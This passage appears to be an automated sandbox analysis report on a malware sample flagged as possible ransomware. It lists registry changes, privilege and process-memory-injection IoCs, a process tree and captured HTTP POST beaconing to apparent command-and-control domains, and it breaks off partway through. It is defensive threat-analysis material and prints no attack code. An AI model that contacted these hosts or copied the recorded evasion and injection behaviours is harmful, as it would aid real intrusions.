Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a5276a0320aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9912 = "Windows Media Audio file"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{8082C5E6-4C27-48EC-A809-B8E1122E8F97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ec1b190b20aada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\acppage.dll,-6003 = "Windows Command Script"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000008086610a20aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\wshext.dll,-4802 = "VBScript Script File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\searchfolder.dll,-9023 = "Saved Search"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-126 = "Microsoft Word Macro-Enabled Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-194 = "Microsoft Excel Add-In"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f467ae0420aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9907 = "MIDI Sequence"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ef64460320aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-177 = "Microsoft PowerPoint Macro-Enabled Slide Show"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000edbdb90a20aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-115 = "Microsoft Excel 97-2003 Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9914 = "Windows Media Audio/Video file"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000660e8a0a20aada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-24585 = "Cascading Style Sheet Document"	SearchProtocolHost.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
748	javaws.exe
748	javaws.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
3116	DiagnosticsHub.StandardCollector.Service.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	820	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
Token: SeAuditPrivilege	2180	fxssvc.exe
Token: SeRestorePrivilege	3632	TieringEngineService.exe
Token: SeManageVolumePrivilege	3632	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	3540	AgentService.exe
Token: SeBackupPrivilege	3488	vssvc.exe
Token: SeRestorePrivilege	3488	vssvc.exe
Token: SeAuditPrivilege	3488	vssvc.exe
Token: SeBackupPrivilege	4580	wbengine.exe
Token: SeRestorePrivilege	4580	wbengine.exe
Token: SeSecurityPrivilege	4580	wbengine.exe
Token: 33	1592	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1592	SearchIndexer.exe
Token: SeDebugPrivilege	2072	alg.exe
Token: SeDebugPrivilege	2072	alg.exe
Token: SeDebugPrivilege	2072	alg.exe
Token: SeDebugPrivilege	3116	DiagnosticsHub.StandardCollector.Service.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 748	820	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe	82
PID 820 wrote to memory of 748	820	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe	82
PID 1592 wrote to memory of 3888	1592	SearchIndexer.exe	109
PID 1592 wrote to memory of 3888	1592	SearchIndexer.exe	109
PID 1592 wrote to memory of 4648	1592	SearchIndexer.exe	110
PID 1592 wrote to memory of 4648	1592	SearchIndexer.exe	110

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820
- C:\Program Files\Java\jre-1.8\bin\javaws.exe
  C:\Users\Admin\AppData\Local\Temp\1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:748

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:3524

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:668

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2404

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:2864

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:2236

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:2084

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:1544

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:3040

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:4536

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4888

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:4600

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4504

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:2668

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3540

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:3576

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:2448

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:3888
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
  2⤵
  - Modifies data under HKEY_USERS
  PID:4648

Network

DNS

pywolwnvd.biz

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

35.91.124.102
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

91.90.14.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.90.14.23.in-addr.arpa

IN PTR

Response

91.90.14.23.in-addr.arpa

IN PTR

a23-14-90-91deploystaticakamaitechnologiescom
POST

http://pywolwnvd.biz/vhmmxjjif

alg.exe

Remote address:

35.91.124.102:80

Request

POST /vhmmxjjif HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=82d275a9aa4ab1e5d2b57e4e02883f12|191.101.209.39|1716145739|1716145739|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://pywolwnvd.biz/aboqnjlnnl

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

35.91.124.102:80

Request

POST /aboqnjlnnl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a8eb7ac89c625e0b375b388a988a2697|191.101.209.39|1716145739|1716145739|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ssbzmoy.biz

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://ssbzmoy.biz/xq

alg.exe

Remote address:

18.141.10.107:80

Request

POST /xq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=71b6956af3d1f339ce1a093baba4b7c3|191.101.209.39|1716145740|1716145740|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ssbzmoy.biz/xq

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

18.141.10.107:80

Request

POST /xq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3b2df1c66754f244e8f4b00d67298c86|191.101.209.39|1716145740|1716145740|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

102.124.91.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

102.124.91.35.in-addr.arpa

IN PTR

Response

102.124.91.35.in-addr.arpa

IN PTR

ec2-35-91-124-102 us-west-2compute amazonawscom
DNS

cvgrf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
DNS

cvgrf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/txyjj

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

54.244.188.177:80

Request

POST /txyjj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=83d705b557ef4a5c1858526d55cc022e|191.101.209.39|1716145740|1716145740|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

107.10.141.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.10.141.18.in-addr.arpa

IN PTR

Response

107.10.141.18.in-addr.arpa

IN PTR

ec2-18-141-10-107ap-southeast-1compute amazonawscom
POST

http://cvgrf.biz/pek

alg.exe

Remote address:

54.244.188.177:80

Request

POST /pek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
